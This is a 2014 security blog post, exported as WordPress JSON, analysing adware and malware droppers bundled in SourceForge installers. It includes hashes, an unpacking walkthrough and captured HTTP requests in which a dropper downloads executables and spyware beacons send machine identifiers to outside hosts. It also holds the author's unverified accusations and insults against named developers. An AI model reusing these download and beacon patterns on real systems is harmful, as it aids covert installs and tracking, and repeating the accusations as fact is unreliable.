{"id":908,"date":"2014-10-13T10:44:38","date_gmt":"2014-10-13T10:44:38","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=908"},"modified":"2014-10-20T12:32:12","modified_gmt":"2014-10-20T12:32:12","slug":"damn-you-sourceforge","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2014\/10\/damn-you-sourceforge\/","title":{"rendered":"Damn You SourceForge"},"content":{"rendered":"

SourceForge has been around as long as I can remember. Bringing open source projects to the world for people to download and peer at source code and projects.
\nWith github taking over in popularity, the need for SourceForge has dwindled. Slashdot owns SourceForge now (or maybe they always have? I don’t recall).
\nSo what brings my piss to a boil today? Malware hosted on SourceForge. You’d think they’d have some sort of AV scan on their CDN, but no! I try and reach out to SourceForge, but its in Vain – they wont even get back to me \/ acknowledge my existence.<\/p>\n

Take ‘Nick’ for example.
\nhttps:\/\/sourceforge.net\/u\/ub3rst4r\/profile\/<\/a>
\nBunch of projects, claiming GPL open source, but then you look up one of the binaries on VirusTotal
\nhttps:\/\/www.virustotal.com\/en\/file\/69a7d7e2d7c3deb663abf60273e70b35f42920401cd754b6bce4a7cb67ebdac0\/analysis\/<\/a>
\n23\/55. That’s a serious problem. You’ll also notice all of the fake reviews claiming the software is good. <\/p>\n

Mr Nick is surprisingly easy to find on the net. A few seconds on google reveals this isn’t his first time distributing malware<\/a>.
\n\"uberstar1\"<\/a>
\nSpeculation? No, google earth is free. <\/p>\n

Let’s peek inside just for shits and giggles shall we?<\/p>\n

I’m grabbing Little Privacy Cleaner (ironic as ****).
\nThe icon appears to be an older nullsoft installer. This means the old 7-zip trick works and I don’t have to run it to pull the files out (yet).
\n\"littleprivacycleaner1\"<\/a><\/p>\n

We see our ‘GPL.txt’ as well as the clean portable binary, however we’re interested in the other stuff that gets packed along side. Normally the $TEMP folder in regards to Nullsoft installers contains any DLL’s the application will need to place when installing. Inside we see a .net framework installer and something named ‘Product21361_Distribution22179_Partner15953.exe’. Seems legit<\/a>.<\/p>\n

Filename: Product21361_Distribution22179_Partner15953.exe
\nMD5 Hash: BCCE565C894B1B1E85A6162459A284B6
\nDetection ratio: 13 \/ 55 <\/p>\n

Once again, another nullsoft installer, but this one is different, there’s no exe inside. Just a dll.<\/p>\n

Opening this ‘Product21361_Distribution22179_Partner15953.exe’ in 7zip shows us some file named ‘revs.dat’, and a dll named ‘convert.dll’. <\/p>\n

\"nullsoft0\"<\/a><\/p>\n

Rev.dat doesn’t seem to contain any useful data, in fact its a bunch of gibberish. I’ll bet dollars to donuts that ‘convert.dll’ most likely decodes \/ decrypts this file as an exe. That said, let’s poke around inside this nullsoft installer with our debugger, see if we can’t extract something good. Since there is no exe inside the archive, the fastest way to seeing what’s actually inside is to set a breakpoint on CreateProcessA<\/a>. If you like going through things thoroughly, then set breakpoints on WriteFile<\/a> and follow the second arg, however in the interest of saving time \/ being lazy, let’s just break on CreateProcess.<\/p>\n

\"nullsoft1\"<\/a><\/p>\n

Looks like we have our true ‘revs.exe’ file running out of the temp folder. You’ll also notice a URI in the command line arguments to ‘installer.ppodownload.com’.
\nThis is most certainly our dropper that grabs all the goodies off the net. When I ran the thing and watched, it pulled down a few other files including some system checker tool, something named ‘svchost.exe’. Here’s a small exert from WireShark:
\nGET \/apps\/dist\/3333-1050_CheckMeUp.exe
\nHTTP\/1.0Host: fmc.pagecdn.org
\nUser-Agent: NSISDL\/1.2 (Mozilla)
\nAccept: *\/*HTTP\/1.1 200 OKD
\nate: Fri, 10 Oct 2014 10:02:30 GMT
\nExpires: Thu, 16 Oct 2014 15:38:48 GMT
\nLast-Modified: Sun, 05 Oct 2014 12:17:37 GMT
\nCache-Control: max-age=604800
\nContent-Type: application\/octet-stream
\nETag: “6abdac-504abf3a2ba40”
\nAccept-Ranges: bytes
\nServer: Apache
\nContent-Length: 6995372
\nConnection: close
\nMZ………………….@………………………………………..!..L.!This<\/p>\n

I think it’s safe to conclude this “GPL” software is about as GPL as the Powerpoint. <\/p>\n

Another one I stumbled across was called DVDStyler made by a guy named Alex Thuering<\/a>.<\/p>\n

Check out this guy’s bug list<\/a>
\n\"buglist\"<\/a><\/p>\n

He neither confirms nor denies malware in his project and marks it as “wont fix”. What an asshat.<\/p>\n

Bad mouthing aside, let’s dive into his software shall we?
\nRunning the installer at first goes normally until I notice a service is created.
\nWhat the hell is this?
\n\"dvdspyware\"<\/a> Bunch of advertising BS and spyware – Uncool. Here’s some of the crap pulled down from WireShark:
\n<\/p>\n

\n
GET<\/span> \/<\/span>downloader\/<\/span>dvdstyler\/<\/span>dvdstyler\/<\/span>6f56<\/span>ee8639e18848b79eec5679bbae0f?<\/span>v=<\/span>2.4<\/span>&<\/span>uid=<\/span>6f56<\/span>ee8639e18848b79eec5679bbae0f&muid=<\/span>A9D8BBF4D5B810A589F48F3EF32D0571&v1=<\/span>UGxlYXNlIHdhaXQgd2hpbGUgV01JQyBpcyBiZWluZyBpbnN0YWxsZWQuU2VyaWFsTnVtYmVyICBWZXJzaW9uICAgICANDQowICAgICAgICAgICAgIFZCT1ggICAtIDE&v2=<\/span>1<\/span> HTTP\/<\/span>1.1<\/span>Accept: *\/*<\/span>Accept-<\/span>Language: en-<\/span>usAccept-<\/span>Encoding: gzip, deflateUser-<\/span>Agent: Mozilla\/<\/span>4.0<\/span> (compatible;<\/span> MSIE 6.0<\/span>;<\/span> Windows NT 5.1<\/span>;<\/span> SV1;<\/span> InfoPath.2<\/span>;<\/span> .NET CLR 2.0<\/span>.50727<\/span>)Host: sub.miscitation.infoConnection: Keep-<\/span>Alive\r\n\r\nGET<\/span> \/<\/span>pinger?<\/span>event_type=<\/span>offer_accepted&installer_source=<\/span>tokyo-<\/span>bidl&software_type=<\/span>sponsored&muid=<\/span>a9d8bbf4d5b810a589f48f3ef32d0571&client_uid=<\/span>5368988<\/span>CCFFF48B29F5855AB56C0ADB0&uniqid=<\/span>false<\/span>&<\/span>affiliate_id=<\/span>dvdstyler&software_id=<\/span>dvdstyler&sponsored_id=<\/span>searchprotect_installium_us&tokyo_csrf2_key=<\/span>de0c73b1757db2b541c4a44e9b63a5a1&tokyo_csrf2_timestamp=<\/span>1413012549<\/span>&<\/span>slot_number=<\/span>1<\/span>&<\/span>index_in_screen=<\/span>1<\/span>&<\/span>index_in_session=<\/span>1<\/span>&<\/span>0.24582076660798047<\/span> HTTP\/<\/span>1.1<\/span>Accept: *\/*<\/span>Referer: http:\/\/<\/span>sub.miscitation.info\/<\/span>downloader\/<\/span>dvdstyler\/<\/span>dvdstyler\/<\/span>6f56<\/span>ee8639e18848b79eec5679bbae0f?<\/span>v=<\/span>2.4<\/span>&<\/span>uid=<\/span>6f56<\/span>ee8639e18848b79eec5679bbae0f&muid=<\/span>A9D8BBF4D5B810A589F48F3EF32D0571&v1=<\/span>UGxlYXNlIHdhaXQgd2hpbGUgV01JQyBpcyBiZWluZyBpbnN0YWxsZWQuU2VyaWFsTnVtYmVyICBWZXJzaW9uICAgICANDQowICAgICAgICAgICAgIFZCT1ggICAtIDE&v2=<\/span>1<\/span>Accept-<\/span>Language: en-<\/span>usAccept-<\/span>Encoding: gzip, deflateUser-<\/span>Agent: Mozilla\/<\/span>4.0<\/span> (compatible;<\/span> MSIE 6.0<\/span>;<\/span> Windows NT 5.1<\/span>;<\/span> SV1;<\/span> InfoPath.2<\/span>;<\/span> .NET CLR 2.0<\/span>.50727<\/span>)Host: sub.miscitation.infoConnection: Keep-<\/span>Alive\r\n<\/pre>\n<\/div>\n
The rage continues. Check out this one<\/a>.
\nThis asshat is distributing his software with a bitcoin miner. 0 mention of this in the installer. Prick.
\nAt least he acknowledges it in the forums<\/a>.<\/p>\n
It seems the SourceForge installer contributes to the problem with their own crap.
\n\"angryip\"<\/a>
\n\"angryip2\"<\/a>
\nHere I used to like Angry IP scanner, but not any more. Then again, why bother when nmap does a much better job?<\/p>\n
Next up is SMPlayer. Pretty popular in terms of downloads
\n\"popular\"<\/a><\/p>\n
‘Tenbob’ knows what’s up, however ‘adem4ik’ is either a bot account or has swallowed the blue pill.
\n\"redpill\"<\/a><\/p>\n
There’s more of them out there too. Websites I used to trust have gone over to the ‘Dark Side’. CNET for example…<\/a>.<\/p>\n
Thanks for reading!<\/p>\n
Oh and I’ll be speaking at ToorCon this year in San Diego on in 2 weeks<\/a>. I’ll be giving a breakdown on the FinFisher<\/a> malware suite. I was gonna hold off until then to post my writeup, to keep the suspense.<\/p>\n
\"1412982063724\"<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
SourceForge has been around as long as I can remember. Bringing open source projects to the world for people to download and peer at source code and projects. With github taking over in popularity, the need for SourceForge has dwindled. Slashdot owns SourceForge now (or maybe they always have? I don’t recall). So what brings […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[7],"tags":[95,48],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/908"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=908"}],"version-history":[{"count":12,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/908\/revisions"}],"predecessor-version":[{"id":937,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/908\/revisions\/937"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=908"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}